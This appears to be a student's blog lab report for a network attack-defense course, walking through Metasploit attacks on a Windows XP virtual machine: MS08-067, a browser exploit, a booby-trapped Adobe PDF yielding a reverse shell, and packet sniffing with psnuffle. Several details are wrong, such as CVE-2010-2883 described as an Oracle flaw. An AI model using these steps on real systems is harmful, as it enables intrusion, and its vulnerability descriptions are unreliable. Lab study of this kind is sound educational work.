20212419 2023-2024-2 《网络与系统攻防技术》实验六实验报告

最新推荐文章于 2024-07-24 08:30:35 发布
最新推荐文章于 2024-07-24 08:30:35 发布
阅读量1.5k 收藏 40
点赞数 33
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62989793/article/details/138726737
版权

文章目录

1.实验内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

  • 一个主动攻击实践,尽量使用最新的类似漏洞;
  • 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
  • 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
  • 成功应用任何一个辅助模块。

2.实验过程

2.1 一个主动攻击实践,尽量使用最新的类似漏洞

2.1.1 确定靶机和主机

1.选择Windows XP sp2作为靶机,使用ipconfig查看ip地址为192.168.207.141。
在这里插入图片描述
2.主机ip地址为192.168.207.141
在这里插入图片描述

2.1.2使用 Metasploit 对 XP 进行渗透

1.输入msfconsole 进入控制台。
2.在命令终端 使用 search 命令 ,搜索该漏洞对应的模块。

search ms08_067

在这里插入图片描述
3.启动这渗透攻击模块查看基本信息并指定一个攻击载荷。
在这里插入图片描述
4.输入代码show targets查看目标。查看渗透攻击模块的攻击平台,这里支持60多种,不同的操作系统平台版本。
在这里插入图片描述
5.上面我们扫描的系统为sp2这里我们用10 中文简体

并设置对应的参数,这里192.168.207.141为本机Kali IP地址。
在这里插入图片描述
6.使用 run 命令发起渗透攻击
在这里插入图片描述
7.输入ipconfig 命令查看该IP地址在这里插入图片描述

2.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞

  • 浏览器攻击实践:使用漏洞CVE-2018-8174
  • 攻击机kali:192.168.207.139
  • 靶机WindowsXP:192.168.207.141

CVE-2018-8174是一种Windows操作系统中存在的漏洞,也被称为“Double Kill”漏洞。这个漏洞是一个远程代码执行漏洞,允许攻击者通过特制的网页或文件来执行恶意代码,从而完全控制受感染的系统。这个漏洞于2018年5月首次被发现,并在被公开后立即成为黑客攻击的目标

2.2.1配置浏览器

1.设置靶机中IE浏览器的安全权限:右键“IE”→“属性”→“安全”→“自定义级别”→启用“对标记为可安全执行脚本的ActiveX控件执行脚本”;“高级”→勾选“允许运行或安装软件,即使签名无效”。
在这里插入图片描述
在这里插入图片描述

2.2.2 进入msfconsole进行参数配置

1.设置攻击载荷

use exploit/windows/browser/ms14_064_ole_code_execution

在这里插入图片描述
2.根据上图设置相关参数如下:

 set SRVHOST 192.168.207.139 # 设置攻击机ip
 set AllowPowerShellPrompt true # msf中的exp代码只对安装powershell的系统生效 
 set LHOST 192.168.207.139
 exploit #发起渗透攻击

3.exploit后将生成网址,在靶机中用浏览器打开该网址,将获取到靶机的shell。
在这里插入图片描述
在这里插入图片描述
成功后显示如下:

在这里插入图片描述
4.获取靶机的shell。

sessions
sessions -i 1

输入shell进入终端。
在这里插入图片描述

2.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞

  • CVE-2010-2883
  • 攻击机kali:192.168.207.139
  • 靶机WindowsXP:192.168.207.141

CVE-2010-2883是一个由Oracle数据库管理系统中的PL/SQL组件引起的漏洞。这个漏洞影响了Oracle Database Server 10.2.0.3、10.2.0.4、10.2.0.5和11.1.0.7版本。攻击者可以利用这个漏洞来执行未经授权的代码或访问敏感信息,从而危及数据库的安全性和完整性。

2.3.1构造载荷

1.输入msfconsole进入控制台
2.创建载荷。

use windows/fileformat/adobe_cooltype_sing

输入show options查看参数
在这里插入图片描述
3.设置参数
输入set FILENAME 20212419luofeng.pdf将文件名改为20212419luofeng。
4.输入exploit创建病毒文件。
在这里插入图片描述
5.将构造的pdf文件通过共享文件夹传到xp靶机上。
在这里插入图片描述
6.在攻击机(kali 2022)重新打开一个msf控制台,监听该攻击机的IP地址的端口号。
在这里插入图片描述
7.在靶机(Windows xp)中用adobe reader 9.0打开2419lf.pdf,发现卡住,返回攻击机(kali 2022)成功获取靶机shell,列出目标靶机目录信息。
请添加图片描述
请添加图片描述

2.4成功应用任何一个辅助模块

利用sniffer(嗅探)功能来看靶机的浏览记录。

search psnuffle
use 0
run

在这里插入图片描述
下图可以看嗅探的关于lftp的下载包。
在这里插入图片描述

3.问题及解决方案

  • 问题1:再主动攻击实践中,一直失败
  • 问题1分析:发现是targets没有选择正确
  • 问题1解决方案:选择正确版本的targets

4.学习感悟、思考等

在本次实验中,我着重探索了几种最新的攻击技术和漏洞,以评估当前系统和软件的安全性。比如在主动攻击实践中,通过使用ms08_067漏洞。通过深入研究和模拟,我成功地利用了目标系统的漏洞,进而获取了对其进行远程访问的权限。这次实践不仅提高了我的攻击技能,也使我更深入地了解了系统安全的重要性。
通过这次实验,我对当前网络安全形势有了更深入的认识,并认识到了保护系统和数据安全的迫切性。我将继续关注最新的安全漏洞和攻击技术,不断提升自己的安全意识和技能,为网络安全做出更大的贡献。

梦想、花开
关注
  • 33
    点赞
  • 40
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
天津理工大学信息安全专业网络攻防实验3-Web攻击与防御
11-28
此外,通过亲自动手实践,加深了对网络攻防技术的理解,认识到网络安全的重要性,以及持续学习和改进防护策略的必要性。 实验过程记录: 在整个实验过程中,我们注意到捕获的数据包包含了登录时的用户名和密码尝试...
天津理工大学信息安全专业网络攻防实验2
11-28
实验报告详细介绍了天津理工大学信息安全专业的一次网络攻防实验,主要关注的是缓冲区溢出攻防技术。实验的目的是让参与者掌握Shellcode的编写流程,理解缓冲区溢出的原理,以及如何利用缓冲区溢出漏洞。实验工具是...
20212419 2023-2024-2 《网络系统攻防技术》实验五实验报告
weixin_62989793的博客
04-16 1775
这是评估目标系统安全性的关键步骤,因为开放的端口可能是攻击者入侵的潜在入口。这些猜测表明,根据扫描结果,该主机可能正在运行Microsoft Windows 10操作系统,或者可能是运行Microsoft Windows Server 2008 R2或Windows 8.1的服务器操作系统。尤其是可以通过向好友发送消息等手段即可获取对方的ip地址,进而查找到相应的信息,如大致的地址等信息。1309/tcp: tcpwrapped - 这是一个未知的服务,可能是由于端口被防火墙或其他安全设备包裹导致的。
20212419 2023-2024-2 《网络系统攻防技术》实验二实验报告
weixin_62989793的博客
03-28 912
UAC(User Account Control,用户帐户控制)是微软为提高系统安全而在Windows Vista和Windows Server 2008中引入的新技术,它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,提供权限或管理员‌密码。Meterpreter不仅可以获取目标主机的屏幕、摄像头、麦克风等设备,甚至还可以通过一些方式来迷惑用户获取系统的system权限,这也就是说,一旦安装的程序中存在后门,那么整个电脑的所有数据都有可能被泄露。
20212419 2023-2024-2《网络系统攻防技术》实验三实验报告
weixin_62989793的博客
04-07 818
再次使用VirusTotal、Virscan来检测生成的后门程序,如下图所示,对比编码一次来看,VirusTotal的检出率为55/71(稍微降低),Virscan的检出率为21/47(没有改变),可以发现,进行十次编码对于实现免杀并没有实质性作用。3.使用VirusTotal、Virscan来检测编译后的后门程序,如图十一所示,VirusTotal的检出率为38/68,Virscan的检出率为5/51,可以发现,使用C + Shellcode编程得到的程序检出率有所下降。
20212419 2023-2024-2 《网络系统攻防技术》实验八实验报告
weixin_62989793的博客
05-13 845
文章目录1.实验内容2.实验过程2.1 Web前端HTML2.2 Web前端javascipt2.3 Web后端:MySQL基础2.4 Web后端:编写PHP网页,连接数据库,进行用户认证2.5最简单的SQL注入,XSS攻击测试2.5.1 sql注入2.5.2 XSS攻击2.6 安装Webgoat或类似平台,并完成SQL注入、XSS、CSRF攻击2.6.1 sql注入攻击2.6.2 XSS注入攻击2.6.3CRSF攻击3.问题及解决方案4.学习感悟、思考等 1.实验内容 (1)Web前端HTML 能正常安
20212303 2023-2024-2 《网络系统攻防技术》实验4实验报告
m0_62984455的博客
04-15 970
二进制文件可能是恶意软件,具有隐藏功能和破坏性。命名不影响其数字指纹。
20212308 2023-2024-2 《网络系统攻防技术》实验八实验报告
Wxc20212308的博客
06-05 685
它提供了对文档的结构化的表述,并定义了一种方式——程序和脚本能够动态地访问和更新文档的内容、结构和样式。随着时间的推移,PHP 已经成为一种广泛使用的开源语言,并且拥有大量的库和框架,可以处理从简单的网站到复杂的企业级应用程序的各种任务。MariaDB是一个开源的关系型数据库管理系统,它是MySQL的一个分支,由MySQL的创始人之一Michael Widenius领导的团队开发和维护。编写一个带有表单的简单的html,模拟用户登录页面,表单中有三个输入框,一个是用户名、一个是口令、还有一个是提交按钮。
20212306 2023-2024-2 《网络系统攻防技术》实验五实验报告
m0_62796010的博客
04-23 1683
从besti.edu.cn中选择一个DNS域名进行查询,获取如下信息:DNS注册人及联系方式、该域名对应IP地址、IP地址注册人及联系方式、IP地址所在国家、城市和具体地理位置。获取wechat某一好友的IP地址,并查询获取该好友所在的具体地理位置。使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。靶机IP地址是否活跃;靶机开放了哪些TCP和UDP端口;靶机安装了什么操作系统,版本是多少;靶机上安装了哪些服务。
20212419 2023-2024-2 《网络系统攻防技术》实验七实验报告
weixin_62989793的博客
05-13 902
SET工具的简单操作让我惊讶,它让建立冒名网站变得轻而易举,仿佛站在了黑客的角度,让我更加深刻地理解了网络攻击的手法。查看靶机IP,可以发现靶机IP为192.168.207.141,网关为192.168.207.2,此时使用命令ping www.tykd.comDNS解析出的IP为47.56.157.205。为了使Windows 11主机能够访问虚拟机的网站,故将IP设为虚拟机的桥接网卡的IP,这里可以直接enter跳过。本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。
20212324 2023-2024-2 《网络系统攻防技术》实验八实验报告
foruxx的博客
06-05 682
WebGoat运行在带有java虚拟机的平台之上,当前提供的训练课程有30多个,其中包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、web服务、Open Authentication失效、危险的HTML注释等等。用户可以提交一段数据库查询代码,根 据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即 SQL注入。在1.1的基础上,编写JavaScript验证用户名、密码的规则。
网络攻防课程seed-labs实验-Sniffing_Spoofing.zip
06-01
网络攻防课程seed-labs实验-Sniffing_Spoofing.zip》是一个与网络安全相关的实验,主要聚焦在嗅探(Sniffing)和欺骗(Spoofing)这两个关键概念上。这两个技术网络攻防领域的重要组成部分,理解和掌握它们对于...
网络攻防课程seed-labs实验-Buffer_Overflow_Server.zip
06-01
网络攻防课程:深入理解Buffer Overflow Server》 在网络安全领域,Buffer Overflow是经典且重要的攻击手段之一。这个实验——“Buffer Overflow Server”,是网络攻防课程中的一个关键环节,旨在帮助学生理解并...
网络攻防课程seed-labs实验-TCP_Attacks.zip
06-01
【TCP攻击实验】是网络攻防课程中的一个重要环节,它主要关注网络安全领域中的TCP协议漏洞和防御策略。...同时,实验报告的编写也是对学习成果的总结和展示,能提高学生的分析和表达能力,加深对TCP攻防技术的理解。
【Socket 编程】基于UDP协议建立多人聊天室
稻草人敲代码的博客
07-19 465
对于服务端来说,除了要接收消息之外,还要实现一个路由转发模块,该路由转发模块可以将相应发送给所有连接的客户端。而对于客户端来说,除了要发送消息给聊天室,还要能实时看到其它所有客户端的消息。下面来看看具体实现的代码,代码只给出核心模块,其余代码模块代码可以借鉴我之前的博客。具体来说,服务器类实现的功能只有收消息。
MarkTool之TCP服务端
最新发布
Qt学视觉
07-24 155
MarkTool之TCP服务端
docker build时的网络问题
flynetcn的专栏
07-19 426
docker build网络问题
【ROS2】演示:为有损网络使用服务质量设置
cxyhjl的博客
07-22 772
目录背景先决条件运行演示命令行选项添加网络流量背景请阅读有关 QoS 设置的文档页面,以获取有关 ROS 2 中可用支持的背景信息。在这个演示中,我们将生成一个发布相机图像的节点和另一个订阅图像并在屏幕上显示图像的节点。然后,我们将模拟它们之间的丢包网络连接,并展示不同的服务质量设置如何处理不良链接。先决条件本教程假设您已安装并运行 ROS 2 和 OpenCV。有关安装说明,请...
网络攻防技术精要:虚拟网络与安全防护
"网络攻防实践复习资料,涵盖了网络攻防技术框架、物理与社会工程学攻击、软件安全漏洞生命周期、Web安全、VMWare虚拟网络、HoneyPot和HoneyNet、信息收集、扫描技术、OS指纹识别、局域网嗅探、Wireshark使用、网络...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值